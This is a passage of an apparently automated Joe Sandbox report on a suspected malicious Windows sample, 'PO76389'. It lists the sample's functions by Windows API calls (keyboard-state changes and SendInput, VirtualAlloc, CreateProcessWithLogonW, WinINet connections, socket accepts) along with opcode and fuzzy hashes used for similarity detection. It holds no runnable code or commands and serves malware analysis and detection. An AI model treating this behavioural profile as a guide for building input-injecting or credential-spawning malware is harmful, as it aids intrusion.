                                                    • Instruction Fuzzy Hash: DFD092705007139FE7209B65E81969A7AF8BF25715F104429E4D5D2650EAF4C884DAA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1a16f05a4aa0b92090575b49b94c4774475c6d084cf5670643f60fec91373a86
                                                    • Instruction ID: 495c99ba5fcb5b9d94ef0d9928b9794def037eab0a9cab807f96e3db150e5d00
                                                    • Opcode Fuzzy Hash: 1a16f05a4aa0b92090575b49b94c4774475c6d084cf5670643f60fec91373a86
                                                    • Instruction Fuzzy Hash: 18C1AD74A0025AEFCB14CFA5C884EAEB7B5FF48305F10859AE901AB251D734FE51CBA5
                                                    APIs
                                                    • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00506AA6), ref: 004BAB2D
                                                    • _wcscmp.LIBCMT ref: 004BAB49
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper_wcscmp
                                                    • String ID:
                                                    • API String ID: 820872866-0
                                                    • Opcode ID: e4c5520e70cd9ccf6063c1d90480c4dcf1b016baad48ae8e805b9abf40e2055b
                                                    • Instruction ID: c452ed8bc6a15da0d651c839a9d130da01336ae6dd5daf9ec8e567b8f2685be6
                                                    • Opcode Fuzzy Hash: e4c5520e70cd9ccf6063c1d90480c4dcf1b016baad48ae8e805b9abf40e2055b
                                                    • Instruction Fuzzy Hash: EAA12771700106DBDB14DF25E9816AEBBB1FF48300F60416BED56C3290DB389871D7AA
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 00510D85
                                                    • CharLowerBuffW.USER32(?,?), ref: 00510DC8
                                                      • Part of subcall function 00510458: CharLowerBuffW.USER32(?,?,?,?), ref: 00510478
                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00510FB2
                                                    • _memmove.LIBCMT ref: 00510FC2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    • Opcode ID: 990c8287266b6f75b68f2e464732258c015afde6e9cd7175210df0b83d139564
                                                    • Instruction ID: 546f507c582d3a314b5d1c248e17cdf05cbadb8f2020c48da34deb5255077ec6
                                                    • Opcode Fuzzy Hash: 990c8287266b6f75b68f2e464732258c015afde6e9cd7175210df0b83d139564
                                                    • Instruction Fuzzy Hash: A5B1AF756043008FC704DF29C480AAABBE5FF88714F14896EF8899B391DB75ED86CB95
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0050AF56
                                                    • CoUninitialize.COMBASE ref: 0050AF61
                                                      • Part of subcall function 004F1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 004F10B8
                                                    • VariantInit.OLEAUT32(?), ref: 0050AF6C
                                                    • VariantClear.OLEAUT32(?), ref: 0050B23F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 28cbb11bb3b81399aee67483b09f84904c2379b460faf8debbc5b1a03a4ae6ec
                                                    • Instruction ID: 1fc258358625c3457c13aa6f3400380a74272f4a9d7ce194f82c0568a1eae578
                                                    • Opcode Fuzzy Hash: 28cbb11bb3b81399aee67483b09f84904c2379b460faf8debbc5b1a03a4ae6ec
                                                    • Instruction Fuzzy Hash: 02A146392046029FD710DF15C891B5EBBE4BF88324F04441EF995AB3A1DB34ED00CB96
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                    • String ID:
                                                    • API String ID: 3877424927-0
                                                    • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                    • Instruction ID: 0fdffced7ad590d749617e89cad920432d520489334dab08fc18210325794b06
                                                    • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                    • Instruction Fuzzy Hash: E651D630B003059BDF249FAD88A06AF77A1AF81324F24872FFC65967D0D7789D919B49
                                                    APIs
                                                    • GetWindowRect.USER32(00D77500,?), ref: 0051C354
                                                    • ScreenToClient.USER32(?,00000002), ref: 0051C384
                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0051C3EA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: a283aa5cf01b0232632478e96d108285d55695cf6e876888d78fdd626ed98b5a
                                                    • Instruction ID: 4422f4b5c38a6cd6fc3a634d09ccb8b61ab6a904293cf9b8b0eadad0217002cd
                                                    • Opcode Fuzzy Hash: a283aa5cf01b0232632478e96d108285d55695cf6e876888d78fdd626ed98b5a
                                                    • Instruction Fuzzy Hash: 68517B31A00204EFEF20DF68D880AEE7FB6BB55360F248559F8259B290D771ED81DB90
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 004ED258
                                                    • __itow.LIBCMT ref: 004ED292
                                                      • Part of subcall function 004ED4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 004ED549
                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 004ED2FB
                                                    • __itow.LIBCMT ref: 004ED350
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: ac10ed6756a29d99ca3fe01b8ee66a39b0a56568318168a6c53f3a88a3858757
                                                    • Instruction ID: f439645b11a4d5579c2fe456fd83c06c3b059672f97f1e3e18a1e2803ae372f6
                                                    • Opcode Fuzzy Hash: ac10ed6756a29d99ca3fe01b8ee66a39b0a56568318168a6c53f3a88a3858757
                                                    • Instruction Fuzzy Hash: 0C41E671A00249ABDF11DF56C842BEF7BB9AF58705F00005FFA05A3291DB789A45CB6A
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004FEF32
                                                    • GetLastError.KERNEL32(?,00000000), ref: 004FEF58
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004FEF7D
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004FEFA9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: ffbfd21819aa8bcc5717b89dab6482e33e962ed6582a5706f767f19f20ab4683
                                                    • Instruction ID: d9e8d9f90eeb79a8fa8a86b1af4bcd2cd1b529911bad5e6058e46823663e1982
                                                    • Opcode Fuzzy Hash: ffbfd21819aa8bcc5717b89dab6482e33e962ed6582a5706f767f19f20ab4683
                                                    • Instruction Fuzzy Hash: 64416C39600611DFCB10EF16C544A5ABBF5EF88324B18809EE945AF362DB78FD01DBA5
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0051B3E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: b2e0f4ddab85e807db2bdc24cfadd4ee22b68e5129fa7c248adfe5368fb35810
                                                    • Instruction ID: af682b03fa785d0868b225631e6514240b63fa820b6135b70ed39b564d8cc7b6
                                                    • Opcode Fuzzy Hash: b2e0f4ddab85e807db2bdc24cfadd4ee22b68e5129fa7c248adfe5368fb35810
                                                    • Instruction Fuzzy Hash: 2E319034600204EFFF249E58DC85FE83F66BB05350F54C916FA61D62A2C7B0E9D4AB61
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 0051D617
                                                    • GetWindowRect.USER32(?,?), ref: 0051D68D
                                                    • PtInRect.USER32(?,?,0051EB2C), ref: 0051D69D
                                                    • MessageBeep.USER32(00000000), ref: 0051D70E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: 068cf751805594ce1ed92d983e51dfa1cbba26cc1f0e0f639a3fcdc7093f14e9
                                                    • Instruction ID: ad77445d79938f4c63deb8947b5f10376097fb3f01477646964d718debed4c75
                                                    • Opcode Fuzzy Hash: 068cf751805594ce1ed92d983e51dfa1cbba26cc1f0e0f639a3fcdc7093f14e9
                                                    • Instruction Fuzzy Hash: 85418D35600619DFEB11CF98E884BE9BFF5FB55300F1881AAE4599B291D730E885EB60
                                                    APIs
                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 004F44EE
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 004F450A
                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 004F456A
                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 004F45C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: caff641162b6e27fbbd957de4991be57fbdef9dc00790c18ea8d400e33f1324a
                                                    • Instruction ID: 6f01a0dfa84a084423ed1e51ca9aa0b515a5510356f17a2b6788c06e40031a6f
                                                    • Opcode Fuzzy Hash: caff641162b6e27fbbd957de4991be57fbdef9dc00790c18ea8d400e33f1324a
                                                    • Instruction Fuzzy Hash: 21311271A0025C7BEF20AB6498087BF7BB59B89314F04121BF381923C1CB7C8A49976A
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004E4DE8
                                                    • __isleadbyte_l.LIBCMT ref: 004E4E16
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004E4E44
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004E4E7A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: d9827d7888c7ad08dead5306605e9f70b43a2422513966afef9670cdf046c3d9
                                                    • Instruction ID: 7fbdcfde6bccf4fc75a3ddda58813ce925c4e715ef4a9248ccfcdf9bcc4b5906
                                                    • Opcode Fuzzy Hash: d9827d7888c7ad08dead5306605e9f70b43a2422513966afef9670cdf046c3d9
                                                    • Instruction Fuzzy Hash: 0631C130600286AFDF219F7ACC45BAB7BB5BF81311F15456AE821872A0E738EC51D794
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00517AB6
                                                      • Part of subcall function 004F69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F69E3
                                                      • Part of subcall function 004F69C9: GetCurrentThreadId.KERNEL32 ref: 004F69EA
                                                      • Part of subcall function 004F69C9: AttachThreadInput.USER32(00000000,?,004F8127), ref: 004F69F1
                                                    • GetCaretPos.USER32(?), ref: 00517AC7
                                                    • ClientToScreen.USER32(00000000,?), ref: 00517B00
                                                    • GetForegroundWindow.USER32 ref: 00517B06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 7748d447e8244f15e2b6b49e458ad6bef6b9951429d2a73ebea6a87c25b376d6
                                                    • Instruction ID: 348339712a9c0a7f1e6253db418b1a347b5ccfdefa815ad76f0ff0ba9b033c36
                                                    • Opcode Fuzzy Hash: 7748d447e8244f15e2b6b49e458ad6bef6b9951429d2a73ebea6a87c25b376d6
                                                    • Instruction Fuzzy Hash: A1310F75D00108AFDB00EFB6D985DEFBBF9EF58314B10806AE815E7211DA759E058BA4
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005049B7
                                                      • Part of subcall function 00504A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00504A60
                                                      • Part of subcall function 00504A41: InternetCloseHandle.WININET(00000000), ref: 00504AFD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 41d120cdf72c1bb7103230b9dc3e3499858004671b3ed49ee71bd54d692555cc
                                                    • Instruction ID: 292d84a00f76bcf0ea2cac8f4ec5bac3890348645a97877a5744fbdda2cdec4f
                                                    • Opcode Fuzzy Hash: 41d120cdf72c1bb7103230b9dc3e3499858004671b3ed49ee71bd54d692555cc
                                                    • Instruction Fuzzy Hash: 0B21C571240605BBDB129F609C05F7FBFBAFB98711F10441AFA0596690EB719814AF64
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004EBCD9
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004EBCE0
                                                    • CloseHandle.KERNEL32(00000004), ref: 004EBCFA
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004EBD29
                                                    Similarity
                                                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 2621361867-0
                                                    • Opcode ID: 97e018d1497b4e4c7d573fda66d56b2070f84e739b1adf406e47e288de150238
                                                    • Instruction ID: f37c99ab4e50f8c439dd18181343a8346353e68ef65ce7a52e7971bcbb487def
                                                    • Opcode Fuzzy Hash: 97e018d1497b4e4c7d573fda66d56b2070f84e739b1adf406e47e288de150238
                                                    • Instruction Fuzzy Hash: A3217F72104249ABCF029F99ED49FEF7BB9EF04305F104055FE01A2260C77A8D65EBA5
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005188A3
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005188BD
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005188CB
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005188D9
                                                    Similarity
                                                    • API ID: Window$Long$AttributesLayered
                                                    • String ID:
                                                    • API String ID: 2169480361-0
                                                    • Opcode ID: b4e5503049cb6482570d2f40e43bd725459bd7dcf9816a3545840e0ab7247e49
                                                    • Instruction ID: f9f8f7c89c5270e2594368b0869e04aa3baaee22a6e90a905c17fa54ee6857e2
                                                    • Opcode Fuzzy Hash: b4e5503049cb6482570d2f40e43bd725459bd7dcf9816a3545840e0ab7247e49
                                                    • Instruction Fuzzy Hash: AC11AC35204114BFEB14AB29DC55FFA7BA9BF85324F04851AF816C72A1CBA4AC40CBA4
                                                    APIs
                                                    • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 0050906D
                                                    • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 0050907F
                                                    • accept.WS2_32(00000000,00000000,00000000), ref: 0050908C
                                                    • WSAGetLastError.WS2_32(00000000), ref: 005090A3
                                                    Similarity
                                                    • API ID: ErrorLastacceptselect
                                                    • String ID:
                                                    • API String ID: 385091864-0
                                                    • Opcode ID: 239ceb63e50b4fc3239afa462fc87b08ef3686e0a8f4e8a59f1a681ee030f163
                                                    • Instruction ID: 56af49334aaf43d597ee49c4ce51e39b8c35acd2df557cc188d1879660e3c6b4
                                                    • Opcode Fuzzy Hash: 239ceb63e50b4fc3239afa462fc87b08ef3686e0a8f4e8a59f1a681ee030f163
                                                    • Instruction Fuzzy Hash: C321AE76A00124AFCB10DF69D894A9EBBFCEF49710F00816AF809D7391DA749A45CBA0
                                                    APIs
                                                      • Part of subcall function 004F2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?), ref: 004F2CB9
                                                      • Part of subcall function 004F2CAA: lstrcpyW.KERNEL32(00000000,?,?,004F18FD,?,?,?,004F26BC,00000000,000000EF,00000119,?,?,00000000), ref: 004F2CDF
